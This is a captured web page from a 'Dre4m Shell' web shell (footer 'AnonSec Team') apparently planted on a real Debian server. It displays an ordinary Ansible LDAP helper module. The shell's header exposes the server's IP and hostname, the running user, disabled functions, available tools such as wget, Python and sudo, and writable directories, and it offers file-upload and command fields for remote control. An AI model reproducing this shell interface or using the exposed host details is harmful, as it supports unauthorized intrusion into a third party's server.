Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 3.133.114.90
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /lib/python3/dist-packages/ansible_collections/community/general/plugins/module_utils/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /lib/python3/dist-packages/ansible_collections/community/general/plugins/module_utils/ldap.py
# -*- coding: utf-8 -*-

# Copyright (c) 2016, Peter Sagerson <psagers@ignorare.net>
# Copyright (c) 2016, Jiri Tyr <jiri.tyr@gmail.com>
# Copyright (c) 2017-2018 Keller Fuchs (@KellerFuchs) <kellerfuchs@hashbang.sh>
#
# GNU General Public License v3.0+ (see LICENSES/GPL-3.0-or-later.txt or https://www.gnu.org/licenses/gpl-3.0.txt)
# SPDX-License-Identifier: GPL-3.0-or-later

from __future__ import absolute_import, division, print_function
__metaclass__ = type

import re
import traceback
from ansible.module_utils.common.text.converters import to_native

try:
    import ldap
    import ldap.dn
    import ldap.filter
    import ldap.sasl

    HAS_LDAP = True

    SASCL_CLASS = {
        'gssapi': ldap.sasl.gssapi,
        'external': ldap.sasl.external,
    }
except ImportError:
    HAS_LDAP = False


def gen_specs(**specs):
    specs.update({
        'bind_dn': dict(),
        'bind_pw': dict(default='', no_log=True),
        'ca_path': dict(type='path'),
        'dn': dict(required=True),
        'referrals_chasing': dict(type='str', default='anonymous', choices=['disabled', 'anonymous']),
        'server_uri': dict(default='ldapi:///'),
        'start_tls': dict(default=False, type='bool'),
        'validate_certs': dict(default=True, type='bool'),
        'sasl_class': dict(choices=['external', 'gssapi'], default='external', type='str'),
        'xorder_discovery': dict(choices=['enable', 'auto', 'disable'], default='auto', type='str'),
    })

    return specs


class LdapGeneric(object):
    def __init__(self, module):
        # Shortcuts
        self.module = module
        self.bind_dn = self.module.params['bind_dn']
        self.bind_pw = self.module.params['bind_pw']
        self.ca_path = self.module.params['ca_path']
        self.referrals_chasing = self.module.params['referrals_chasing']
        self.server_uri = self.module.params['server_uri']
        self.start_tls = self.module.params['start_tls']
        self.verify_cert = self.module.params['validate_certs']
        self.sasl_class = self.module.params['sasl_class']
        self.xorder_discovery = self.module.params['xorder_discovery']

        # Establish connection
        self.connection = self._connect_to_ldap()

        if self.xorder_discovery == "enable" or (self.xorder_discovery == "auto" and not self._xorder_dn()):
            # Try to find the X_ORDERed version of the DN
            self.dn = self._find_dn()
        else:
            self.dn = self.module.params['dn']

    def fail(self, msg, exn):
        self.module.fail_json(
            msg=msg,
            details=to_native(exn),
            exception=traceback.format_exc()
        )

    def _find_dn(self):
        dn = self.module.params['dn']

        explode_dn = ldap.dn.explode_dn(dn)

        if len(explode_dn) > 1:
            try:
                escaped_value = ldap.filter.escape_filter_chars(explode_dn[0])
                filterstr = "(%s)" % escaped_value
                dns = self.connection.search_s(','.join(explode_dn[1:]),
                                               ldap.SCOPE_ONELEVEL, filterstr)
                if len(dns) == 1:
                    dn, dummy = dns[0]
            except Exception:
                pass

        return dn

    def _connect_to_ldap(self):
        if not self.verify_cert:
            ldap.set_option(ldap.OPT_X_TLS_REQUIRE_CERT, ldap.OPT_X_TLS_NEVER)

        if self.ca_path:
            ldap.set_option(ldap.OPT_X_TLS_CACERTFILE, self.ca_path)

        connection = ldap.initialize(self.server_uri)

        if self.referrals_chasing == 'disabled':
            # Switch off chasing of referrals (https://github.com/ansible-collections/community.general/issues/1067)
            connection.set_option(ldap.OPT_REFERRALS, 0)

        if self.start_tls:
            try:
                connection.start_tls_s()
            except ldap.LDAPError as e:
                self.fail("Cannot start TLS.", e)

        try:
            if self.bind_dn is not None:
                connection.simple_bind_s(self.bind_dn, self.bind_pw)
            else:
                klass = SASCL_CLASS.get(self.sasl_class, ldap.sasl.external)
                connection.sasl_interactive_bind_s('', klass())
        except ldap.LDAPError as e:
            self.fail("Cannot bind to the server.", e)

        return connection

    def _xorder_dn(self):
        # match X_ORDERed DNs
        regex = r"\w+=\{\d+\}.+"
        return re.match(regex, self.module.params['dn']) is not None

Anon7 - 2022
AnonSec Team